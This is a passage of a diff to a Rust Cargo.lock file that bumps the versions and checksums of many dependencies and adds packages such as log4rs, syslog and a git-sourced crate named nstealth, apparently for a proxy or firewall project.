"bcc35a38544a891a5f7c865aca548a982ccb3b8650a5b06d0fd33a10283c56fc" [[package]] name = "libm" -version = "0.2.15" +version = "0.2.16" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9fbbcab51052fe104eb5e5d351cf728d30a5be1fe14d9be8a3b097481fb97de" +checksum = "b6d2cec3eae94f9f509c767b45932f1ada8350c4bdb85af2fcab4a3c14807981" [[package]] name = "libmimalloc-sys" @@ -2508,9 +2533,9 @@ dependencies = [ [[package]] name = "local-ip-address" -version = "0.6.9" +version = "0.6.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "92488bc8a0f99ee9f23577bdd06526d49657df8bd70504c61f812337cdad01ab" +checksum = "79ef8c257c92ade496781a32a581d43e3d512cf8ce714ecf04ea80f93ed0ff4a" dependencies = [ "libc", "neli", @@ -2537,6 +2562,45 @@ name = "log" version = "0.4.29" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" +dependencies = [ + "serde_core", +] + +[[package]] +name = "log-mdc" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a94d21414c1f4a51209ad204c1776a3d0765002c76c6abcb602a6f09f1e881c7" + +[[package]] +name = "log4rs" +version = "1.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e947bb896e702c711fccc2bf02ab2abb6072910693818d1d6b07ee2b9dfd86c" +dependencies = [ + "anyhow", + "arc-swap", + "chrono", + "derive_more", + "flate2", + "fnv", + "humantime", + "libc", + "log", + "log-mdc", + "mock_instant", + "parking_lot", + "rand 0.9.2", + "serde", + "serde-value", + "serde_json", + "serde_yaml 0.9.34+deprecated", + "thiserror 2.0.18", + "thread-id", + "typemap-ors", + "unicode-segmentation", + "winapi", +] [[package]] name = "lru" @@ -2578,7 +2642,7 @@ dependencies = [ "log", "memchr", "serde", - "thiserror 2.0.17", + "thiserror 2.0.18", ] [[package]] @@ -2672,9 +2736,9 @@ dependencies = [ [[package]] name = "mio" -version = "1.1.0" +version = "1.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69d83b0086dc8ecf3ce9ae2874b2d1290252e2a30720bea58a5c6639b0092873" +checksum = "a69bcab0ad47271a0234d9422b131806bf3968021e5dc9328caf2d4cd58557fc" dependencies = [ "libc", "log", @@ -2682,6 +2746,12 @@ dependencies = [ "windows-sys 0.61.2", ] +[[package]] +name = "mock_instant" +version = "0.6.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dce6dd36094cac388f119d2e9dc82dc730ef91c32a6222170d630e5414b956e6" + [[package]] name = "multer" version = "3.1.0" @@ -2708,7 +2778,7 @@ dependencies = [ "libc", "log", "openssl", - "openssl-probe", + "openssl-probe 0.1.6", "openssl-sys", "schannel", "security-framework 2.11.1", @@ -2718,9 +2788,9 @@ dependencies = [ [[package]] name = "neli" -version = "0.7.2" +version = "0.7.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "87fe4204517c0dafc04a1d99ecb577d52c0ffc81e1bbe5cf322769aa8fbd1b05" +checksum = "22f9786d56d972959e1408b6a93be6af13b9c1392036c5c1fafa08a1b0c6ee87" dependencies = [ "bitflags 2.10.0", "byteorder", @@ -2734,15 +2804,15 @@ dependencies = [ [[package]] name = "neli-proc-macros" -version = "0.2.1" +version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90e502fe5db321c6e0ae649ccda600675680125a8e8dee327744fe1910b19332" +checksum = "05d8d08c6e98f20a62417478ebf7be8e1425ec9acecc6f63e22da633f6b71609" dependencies = [ "either", "proc-macro2", "quote", "serde", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -2757,7 +2827,7 @@ dependencies = [ "serde_path_to_error", "strum 0.27.2", "strum_macros 0.27.2", - "thiserror 2.0.17", + "thiserror 2.0.18", ] [[package]] @@ -2774,9 +2844,9 @@ dependencies = [ [[package]] name = "nix" -version = "0.29.0" +version = "0.30.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "71e2746dc3a24dd78b3cfcb7be93368c6de9963d30f43a6a73998a9cf4b17b46" +checksum = "74523f3a35e05aba87a1d978330aef40f67b0304ac79c1c00b294c9830543db6" dependencies = [ "bitflags 2.10.0", "cfg-if", @@ -2786,9 +2856,9 @@ dependencies = [ [[package]] name = "nix" -version = "0.30.1" +version = "0.31.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "74523f3a35e05aba87a1d978330aef40f67b0304ac79c1c00b294c9830543db6" +checksum = "225e7cfe711e0ba79a68baeddb2982723e4235247aefce1482f2f16c27865b66" dependencies = [ "bitflags 2.10.0", "cfg-if", @@ -2849,9 +2919,22 @@ dependencies = [ [[package]] name = "notify-types" -version = "2.0.0" +version = "2.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e0826a989adedc2a244799e823aece04662b66609d96af8dff7ac6df9a8925d" +checksum = "42b8cfee0e339a0337359f3c88165702ac6e600dc01c0cc9579a92d62b08477a" +dependencies = [ + "bitflags 2.10.0", +] + +[[package]] +name = "nstealth" +version = "0.1.0" +source = "git+https://github.com/gen0sec/nstealth?rev=3c87751b9d9537b055a119f155a730360a7d0078#3c87751b9d9537b055a119f155a730360a7d0078" +dependencies = [ + "serde", + "sha2", + "thiserror 1.0.69", +] [[package]] name = "nu-ansi-term" @@ -2890,9 +2973,9 @@ dependencies = [ [[package]] name = "num-conv" -version = "0.1.0" +version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51d515d32fb182ee37cda2ccdcb92950d6a3c2893aa280e540671c2cd0f3b1d9" +checksum = "cf97ec579c3c42f953ef76dbf8d55ac91fb219dde70e49aa4a6b7d74e9919050" [[package]] name = "num-integer" @@ -2953,7 +3036,16 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", +] + +[[package]] +name = "num_threads" +version = "0.1.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c7398b9c8b70908f6371f47ed36737907c87c52af34c268fed0bf0ceb92ead9" +dependencies = [ + "libc", ] [[package]] @@ -3024,7 +3116,7 @@ checksum = "a948666b637a0f465e8564c73e89d4dde00d72d4d473cc972f390fc3dcee7d9c" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -3033,11 +3125,17 @@ version = "0.1.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d05e27ee213611ffe7d6348b942e8f942b37114c00cc03cec254295a4a17852e" +[[package]] +name = "openssl-probe" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7c87def4c32ab89d880effc9e097653c8da5d6ef28e6b539d313baaacfbafcbe" + [[package]] name = "openssl-src" -version = "300.5.4+3.5.4" +version = "300.5.5+3.5.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a507b3792995dae9b0df8a1c1e3771e8418b7c2d9f0baeba32e6fe8b06c7cb72" +checksum = "3f1787d533e03597a7934fd0a765f0d28e94ecc5fb7789f8053b1e699a56f709" dependencies = [ "cc", ] @@ -3055,6 +3153,15 @@ dependencies = [ "vcpkg", ] +[[package]] +name = "ordered-float" +version = "2.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "68f19d67e5a2795c94e73e0bb1cc1a7edeb2e28efd39e2e1c9b7a40c1108b11c" +dependencies = [ + "num-traits", +] + [[package]] name = "os_str_bytes" version = "6.6.1" @@ -3105,7 +3212,7 @@ dependencies = [ "libc", "redox_syscall", "smallvec", - "windows-link 0.2.1", + "windows-link", ] [[package]] @@ -3194,7 +3301,7 @@ checksum = "6e918e4ff8c4549eb882f14b3a4bc8c8bc93de829416eacf579f1207a8fbf861" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -3272,7 +3379,7 @@ dependencies = [ "derivative", "flate2", "futures", - "h2 0.4.12", + "h2 0.4.13", "http 1.4.0", "httparse", "httpdate", @@ -3280,7 +3387,7 @@ dependencies = [ "log", "nix 0.24.3", "once_cell", - "openssl-probe", + "openssl-probe 0.1.6", "parking_lot", "percent-encoding", "pingora-error", @@ -3296,7 +3403,7 @@ dependencies = [ "serde", "serde_yaml 0.8.26", "sfv", - "socket2 0.6.1", + "socket2 0.6.2", "strum 0.26.3", "strum_macros 0.26.4", "tokio", @@ -3434,7 +3541,7 @@ dependencies = [ "bytes", "clap 3.2.25", "futures", - "h2 0.4.12", + "h2 0.4.13", "http 1.4.0", "log", "once_cell", @@ -3511,15 +3618,15 @@ checksum = "4c2749dcd0984ec1be3c01001bb1d83623a58c3c0049a99b9afec61464fa98e7" [[package]] name = "portable-atomic" -version = "1.11.1" +version = "1.13.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f84267b20a16ea918e43c6a88433c2d54fa145c92a811b5b047ccbe153674483" +checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" [[package]] name = "portable-atomic-util" -version = "0.2.4" +version = "0.2.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8a2f0d8d040d7848a709caf78912debcc3f33ee4b3cac47d73d1e1069e83507" +checksum = "7a9db96d7fa8782dd8c15ce32ffe8680bbd1e978a43bf51a34d39483540495f5" dependencies = [ "portable-atomic", ] @@ -3619,14 +3726,14 @@ dependencies = [ "proc-macro-error-attr2", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] name = "proc-macro2" -version = "1.0.103" +version = "1.0.106" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5ee95bc4ef87b8d5ba32e8b7714ccc834865276eab0aed5c9958d00ec45f49e8" +checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" dependencies = [ "unicode-ident", ] @@ -3658,7 +3765,7 @@ dependencies = [ "memchr", "parking_lot", "protobuf 3.7.2", - "thiserror 2.0.17", + "thiserror 2.0.18", ] [[package]] @@ -3718,8 +3825,8 @@ dependencies = [ "quinn-udp", "rustc-hash", "rustls", - "socket2 0.6.1", - "thiserror 2.0.17", + "socket2 0.6.2", + "thiserror 2.0.18", "tokio", "tracing", "web-time", @@ -3741,7 +3848,7 @@ dependencies = [ "rustls", "rustls-pki-types", "slab", - "thiserror 2.0.17", + "thiserror 2.0.18", "tinyvec", "tracing", "web-time", @@ -3756,16 +3863,16 @@ dependencies = [ "cfg_aliases", "libc", "once_cell", - "socket2 0.6.1", + "socket2 0.6.2", "tracing", "windows-sys 0.60.2", ] [[package]] name = "quote" -version = "1.0.42" +version = "1.0.44" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a338cc41d27e6cc6dce6cefc13a0729dfbb81c262b1f519331575dd80ef3067f" +checksum = "21b2ebcf727b7760c461f091f9f0f539b77b8e87f2fd88131e7f1b433b3cece4" dependencies = [ "proc-macro2", ] @@ -3805,7 +3912,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "6db2770f06117d490610c7488547d543617b21bfa07796d7a12f6f1bd53850d1" dependencies = [ "rand_chacha 0.9.0", - "rand_core 0.9.3", + "rand_core 0.9.5", ] [[package]] @@ -3825,7 +3932,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb" dependencies = [ "ppv-lite86", - "rand_core 0.9.3", + "rand_core 0.9.5", ] [[package]] @@ -3834,36 +3941,37 @@ version = "0.6.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" dependencies = [ - "getrandom 0.2.16", + "getrandom 0.2.17", ] [[package]] name = "rand_core" -version = "0.9.3" +version = "0.9.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "99d9a13982dcf210057a8a78572b2217b667c3beacbf3a0d8b454f6f82837d38" +checksum = "76afc826de14238e6e8c374ddcc1fa19e374fd8dd986b0d2af0d02377261d83c" dependencies = [ "getrandom 0.3.4", ] [[package]] name = "rcgen" -version = "0.14.5" +version = "0.14.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5fae430c6b28f1ad601274e78b7dffa0546de0b73b4cd32f46723c0c2a16f7a5" +checksum = "10b99e0098aa4082912d4c649628623db6aba77335e4f4569ff5083a6448b32e" dependencies = [ "aws-lc-rs", "pem", "rustls-pki-types", "time", + "x509-parser", "yasna", ] [[package]] name = "redis" -version = "1.0.2" +version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5dfe20977fe93830c0e9817a16fbf1ed1cfd8d4bba366087a1841d2c6033c251" +checksum = "e969d1d702793536d5fda739a82b88ad7cbe7d04f8386ee8cd16ad3eff4854a5" dependencies = [ "arc-swap", "arcstr", @@ -3881,7 +3989,7 @@ dependencies = [ "r2d2", "ryu", "sha1_smol", - "socket2 0.6.1", + "socket2 0.6.2", "tokio", "tokio-native-tls", "tokio-util", @@ -3915,7 +4023,7 @@ checksum = "b7186006dcb21920990093f30e3dea63b7d6e977bf1256be20c3563a5db070da" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -3963,7 +4071,7 @@ dependencies = [ "bytes", "encoding_rs", "futures-core", - "h2 0.4.12", + "h2 0.4.13", "http 1.4.0", "http-body", "http-body-util", @@ -4018,7 +4126,7 @@ checksum = "a4689e6c2294d81e88dc6261c768b63bc4fcdb852be6d1352498b114f61383b7" dependencies = [ "cc", "cfg-if", - "getrandom 0.2.16", + "getrandom 0.2.17", "libc", "untrusted 0.9.0", "windows-sys 0.52.0", @@ -4026,22 +4134,19 @@ dependencies = [ [[package]] name = "rmp" -version = "0.8.14" +version = "0.8.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "228ed7c16fa39782c3b3468e974aec2795e9089153cd08ee2e9aefb3613334c4" +checksum = "4ba8be72d372b2c9b35542551678538b562e7cf86c3315773cae48dfbfe7790c" dependencies = [ - "byteorder", "num-traits", - "paste", ] [[package]] name = "rmp-serde" -version = "1.3.0" +version = "1.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "52e599a477cf9840e92f2cde9a7189e67b42c57532749bf90aea6ec10facd4db" +checksum = "72f81bee8c8ef9b577d1681a70ebbc962c232461e397b22c208c43c04b67a155" dependencies = [ - "byteorder", "rmp", "serde", ] @@ -4068,9 +4173,9 @@ dependencies = [ [[package]] name = "rust_decimal" -version = "1.39.0" +version = "1.40.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "35affe401787a9bd846712274d97654355d21b2a2c092a3139aabe31e9022282" +checksum = "61f703d19852dbf87cbc513643fa81428361eb6940f1ac14fd58155d295a3eb0" dependencies = [ "arrayvec", "num-traits", @@ -4078,9 +4183,9 @@ dependencies = [ [[package]] name = "rustc-demangle" -version = "0.1.26" +version = "0.1.27" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "56f7d92ca342cea22a06f2121d944b4fd82af56988c270852495420f961d4ace" +checksum = "b50b8869d9fc858ce7266cce0194bd74df58b9d0e3f6df3a9fc8eb470d95c09d" [[package]] name = "rustc-hash" @@ -4108,9 +4213,9 @@ dependencies = [ [[package]] name = "rustix" -version = "1.1.2" +version = "1.1.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cd15f8a2c5551a84d56efdc1cd049089e409ac19a3072d5037a17fd70719ff3e" +checksum = "146c9e247ccc180c1f61615433868c99f3de3ae256a30a43b49f67c2d9171f34" dependencies = [ "bitflags 2.10.0", "errno", @@ -4137,11 +4242,11 @@ dependencies = [ [[package]] name = "rustls-native-certs" -version = "0.8.2" +version = "0.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9980d917ebb0c0536119ba501e90834767bffc3d60641457fd84a1f3fd337923" +checksum = "612460d5f7bea540c490b2b6395d8e34a953e52b491accd6c86c8164c5932a63" dependencies = [ - "openssl-probe", + "openssl-probe 0.2.1", "rustls-pki-types", "schannel", "security-framework 3.5.1", @@ -4158,9 +4263,9 @@ dependencies = [ [[package]] name = "rustls-pki-types" -version = "1.13.0" +version = "1.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "94182ad936a0c91c324cd46c6511b9510ed16af436d7b5bab34beab0afd55f7a" +checksum = "be040f8b0a225e40375822a563fa9524378b9d63112f53e19ffff34df5d33fdd" dependencies = [ "web-time", "zeroize", @@ -4195,9 +4300,9 @@ checksum = "f87165f0995f63a9fbeea62b64d10b4d9d8e78ec6d7d51fb2125fda7bb36788f" [[package]] name = "rustls-webpki" -version = "0.103.8" +version = "0.103.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2ffdfa2f5286e2247234e03f680868ac2815974dc39e00ea15adc445d0aafe52" +checksum = "d7df23109aa6c1567d1c575b9952556388da57401e4ace1d15f79eedad0d8f53" dependencies = [ "aws-lc-rs", "ring", @@ -4213,9 +4318,9 @@ checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" [[package]] name = "ryu" -version = "1.0.20" +version = "1.0.22" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28d3b2b1366ec20994f1fd18c3c594f05c5dd4bc44d8bb0c1c632c8d6829481f" +checksum = "a50f4cf475b65d88e057964e0e9bb1f0aa9bbb2036dc65c64596b42932536984" [[package]] name = "same-file" @@ -4275,7 +4380,7 @@ dependencies = [ "proc-macro2", "quote", "serde_derive_internals", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -4372,6 +4477,16 @@ dependencies = [ "serde_derive", ] +[[package]] +name = "serde-value" +version = "0.7.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f3a1a3341211875ef120e117ea7fd5228530ae7e7036a779fdc9117be6b3282c" +dependencies = [ + "ordered-float", + "serde", +] + [[package]] name = "serde_core" version = "1.0.228" @@ -4389,7 +4504,7 @@ checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -4400,7 +4515,17 @@ checksum = "18d26a20a969b9e3fdf2fc2d9f21eda6c40e2de84c9408bb5d3b05d499aae711" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", +] + +[[package]] +name = "serde_ignored" +version = "0.1.14" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "115dffd5f3853e06e746965a20dcbae6ee747ae30b543d91b0e089668bb07798" +dependencies = [ + "serde", + "serde_core", ] [[package]] @@ -4457,7 +4582,7 @@ version = "0.9.34+deprecated" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "6a8b1a1a2ebf674015cc02edccce75287f1a0130d394307b36743c2f5d504b47" dependencies = [ - "indexmap 2.12.1", + "indexmap 2.13.0", "itoa", "ryu", "serde", @@ -4487,7 +4612,7 @@ checksum = "6f50427f258fb77356e4cd4aa0e87e2bd2c66dbcee41dc405282cae2bfc26c83" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -4497,7 +4622,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3fa1f336066b758b7c9df34ed049c0e693a426afe2b27ff7d5b14f410ab1a132" dependencies = [ "base64 0.22.1", - "indexmap 2.12.1", + "indexmap 2.13.0", "rust_decimal", ] @@ -4546,10 +4671,11 @@ checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" [[package]] name = "signal-hook-registry" -version = "1.4.7" +version = "1.4.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7664a098b8e616bdfcc2dc0e9ac44eb231eedf41db4e9fe95d8d32ec728dedad" +checksum = "c4db69cba1110affc0e9f7bcd48bbf87b3f4fc7c61fc9155afd4c469eb3d6c1b" dependencies = [ + "errno", "libc", ] @@ -4565,9 +4691,9 @@ dependencies = [ [[package]] name = "simd-adler32" -version = "0.3.7" +version = "0.3.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d66dc143e6b11c1eddc06d5c423cfc97062865baf299914ab64caa38182078fe" +checksum = "e320a6c5ad31d271ad523dcf3ad13e2767ad8b1cb8f047f75a8aeaf8da139da2" [[package]] name = "simple_asn1" @@ -4577,21 +4703,21 @@ checksum = "297f631f50729c8c99b84667867963997ec0b50f32b2a7dbcab828ef0541e8bb" dependencies = [ "num-bigint", "num-traits", - "thiserror 2.0.17", + "thiserror 2.0.18", "time", ] [[package]] name = "siphasher" -version = "1.0.1" +version = "1.0.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "56199f7ddabf13fe5074ce809e7d3f42b42ae711800501b5b16ea82ad029c39d" +checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" [[package]] name = "slab" -version = "0.4.11" +version = "0.4.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a2ae44ef20feb57a68b23d846850f861394c2e02dc425a50098ae8c90267589" +checksum = "0c790de23124f9ab44544d7ac05d60440adc586479ce501c1d6d7da3cd8c9cf5" [[package]] name = "sliceslice" @@ -4629,7 +4755,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -4644,9 +4770,9 @@ dependencies = [ [[package]] name = "socket2" -version = "0.6.1" +version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "17129e116933cf371d018bb80ae557e889637989d8638274fb25622827b03881" +checksum = "86f4aa3ad99f2088c990dfa82d367e19cb29268ed67c574d10d0a4bfe71f07e0" dependencies = [ "libc", "windows-sys 0.60.2", @@ -4711,7 +4837,7 @@ dependencies = [ "proc-macro2", "quote", "rustversion", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -4723,7 +4849,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -4745,9 +4871,9 @@ dependencies = [ [[package]] name = "syn" -version = "2.0.111" +version = "2.0.114" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "390cc9a294ab71bdb1aa2e99d13be9c753cd2d7bd6560c77118597410c4d2e87" +checksum = "d4d107df263a3013ef9b1879b0df87d706ff80f65a86ea879bd9c31f9b307c2a" dependencies = [ "proc-macro2", "quote", @@ -4765,12 +4891,12 @@ dependencies = [ "async-trait", "axum", "axum-server", - "base16ct 0.3.0", + "base16ct 1.0.0", "base64 0.22.1", "bytes", "chrono", "clamav-tcp", - "clap 4.5.54", + "clap 4.5.56", "ctrlc", "daemonize", "dashmap", @@ -4791,14 +4917,16 @@ dependencies = [ "libbpf-rs", "local-ip-address", "log", + "log4rs", "maxminddb", "memmap2 0.9.9", "mimalloc", "multer", "native-tls", "nftables", - "nix 0.30.1", + "nix 0.31.1", "notify", + "nstealth", "once_cell", "pingora", "pingora-core", @@ -4818,10 +4946,12 @@ dependencies = [ "rustls", "rustls-pemfile", "serde", + "serde_ignored", "serde_json", "serde_yaml 0.9.34+deprecated", "serial_test", "sha2", + "syslog", "tls-parser", "tokio", "tokio-rustls", @@ -4833,6 +4963,7 @@ dependencies = [ "tracing-subscriber", "trust-dns-resolver", "url", + "urlencoding", "uuid", "vmlinux", "webpki-roots", @@ -4857,7 +4988,19 @@ checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", +] + +[[package]] +name = "syslog" +version = "7.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "019f1500a13379b7d051455df397c75770de6311a7a188a699499502704d9f10" +dependencies = [ + "hostname", + "libc", + "log", + "time", ] [[package]] @@ -4883,9 +5026,9 @@ dependencies = [ [[package]] name = "tempfile" -version = "3.23.0" +version = "3.24.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2d31c77bdf42a745371d260a26ca7163f1e0924b64afa0b688e61b5a9fa02f16" +checksum = "655da9c7eb6305c55742045d5a8d2037996d61d8de95806335c7c86ce0f82e9c" dependencies = [ "fastrand", "getrandom 0.3.4", @@ -4920,11 +5063,11 @@ dependencies = [ [[package]] name = "thiserror" -version = "2.0.17" +version = "2.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f63587ca0f12b72a0600bcba1d40081f830876000bb46dd2337a3051618f4fc8" +checksum = "4288b5bcbc7920c07a1149a35cf9590a2aa808e0bc1eafaade0b80947865fbc4" dependencies = [ - "thiserror-impl 2.0.17", + "thiserror-impl 2.0.18", ] [[package]] @@ -4935,18 +5078,28 @@ checksum = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] name = "thiserror-impl" -version = "2.0.17" +version = "2.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3ff15c8ecd7de3849db632e14d18d2571fa09dfc5ed93479bc4485c7a517c913" +checksum = "ebc4ee7f67670e9b64d05fa4253e753e016c6c95ff35b89b7941d6b856dec1d5" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", +] + +[[package]] +name = "thread-id" +version = "5.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2010d27add3f3240c1fef7959f46c814487b216baee662af53be645ba7831c07" +dependencies = [ + "libc", + "windows-sys 0.61.2", ] [[package]] @@ -4970,30 +5123,32 @@ dependencies = [ [[package]] name = "time" -version = "0.3.44" +version = "0.3.46" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "91e7d9e3bb61134e77bde20dd4825b97c010155709965fedf0f49bb138e52a9d" +checksum = "9da98b7d9b7dad93488a84b8248efc35352b0b2657397d4167e7ad67e5d535e5" dependencies = [ "deranged", "itoa", + "libc", "num-conv", + "num_threads", "powerfmt", - "serde", + "serde_core", "time-core", "time-macros", ] [[package]] name = "time-core" -version = "0.1.6" +version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "40868e7c1d2f0b8d73e4a8c7f0ff63af4f6d19be117e90bd73eb1d62cf831c6b" +checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" [[package]] name = "time-macros" -version = "0.2.24" +version = "0.2.26" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30cfb0125f12d9c277f35663a0a33f8c30190f4e4574868a330595412d34ebf3" +checksum = "78cc610bac2dcee56805c99642447d4c5dbde4d01f752ffea0199aee1f601dc4" dependencies = [ "num-conv", "time-core", @@ -5059,7 +5214,7 @@ dependencies = [ "parking_lot", "pin-project-lite", "signal-hook-registry", - "socket2 0.6.1", + "socket2 0.6.2", "tokio-macros", "windows-sys 0.61.2", ] @@ -5072,7 +5227,7 @@ checksum = "af407857209536a95c8e56f8231ef2c2e2aff839b22e07a1ffcbc617e9db9fa5" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -5130,9 +5285,9 @@ dependencies = [ [[package]] name = "tokio-util" -version = "0.7.17" +version = "0.7.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2efa149fe76073d6e8fd97ef4f4eca7b67f599660115591483572e406e165594" +checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098" dependencies = [ "bytes", "futures-core", @@ -5143,20 +5298,20 @@ dependencies = [ [[package]] name = "toml_datetime" -version = "0.7.3" +version = "0.7.5+spec-1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f2cdb639ebbc97961c51720f858597f7f24c4fc295327923af55b74c3c724533" +checksum = "92e1cfed4a3038bc5a127e35a2d360f145e1f4b971b551a2ba5fd7aedf7e1347" dependencies = [ "serde_core", ] [[package]] name = "toml_edit" -version = "0.23.7" +version = "0.23.10+spec-1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6485ef6d0d9b5d0ec17244ff7eb05310113c3f316f2d14200d4de56b3cb98f8d" +checksum = "84c8b9f757e028cee9fa244aea147aab2a9ec09d5325a9b01e0a49730c2b5269" dependencies = [ - "indexmap 2.12.1", + "indexmap 2.13.0", "toml_datetime", "toml_parser", "winnow", @@ -5164,24 +5319,24 @@ dependencies = [ [[package]] name = "toml_parser" -version = "1.0.4" +version = "1.0.6+spec-1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c0cbe268d35bdb4bb5a56a2de88d0ad0eb70af5384a99d648cd4b3d04039800e" +checksum = "a3198b4b0a8e11f09dd03e133c0280504d0801269e9afa46362ffde1cbeebf44" dependencies = [ "winnow", ] [[package]] name = "tonic" -version = "0.14.2" +version = "0.14.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eb7613188ce9f7df5bfe185db26c5814347d110db17920415cf2fbcad85e7203" +checksum = "a286e33f82f8a1ee2df63f4fa35c0becf4a85a0cb03091a15fd7bf0b402dc94a" dependencies = [ "async-trait", "axum", "base64 0.22.1", "bytes", - "h2 0.4.12", + "h2 0.4.13", "http 1.4.0", "http-body", "http-body-util", @@ -5190,7 +5345,7 @@ dependencies = [ "hyper-util", "percent-encoding", "pin-project", - "socket2 0.6.1", + "socket2 0.6.2", "sync_wrapper", "tokio", "tokio-stream", @@ -5202,13 +5357,13 @@ dependencies = [ [[package]] name = "tower" -version = "0.5.2" +version = "0.5.3" source = 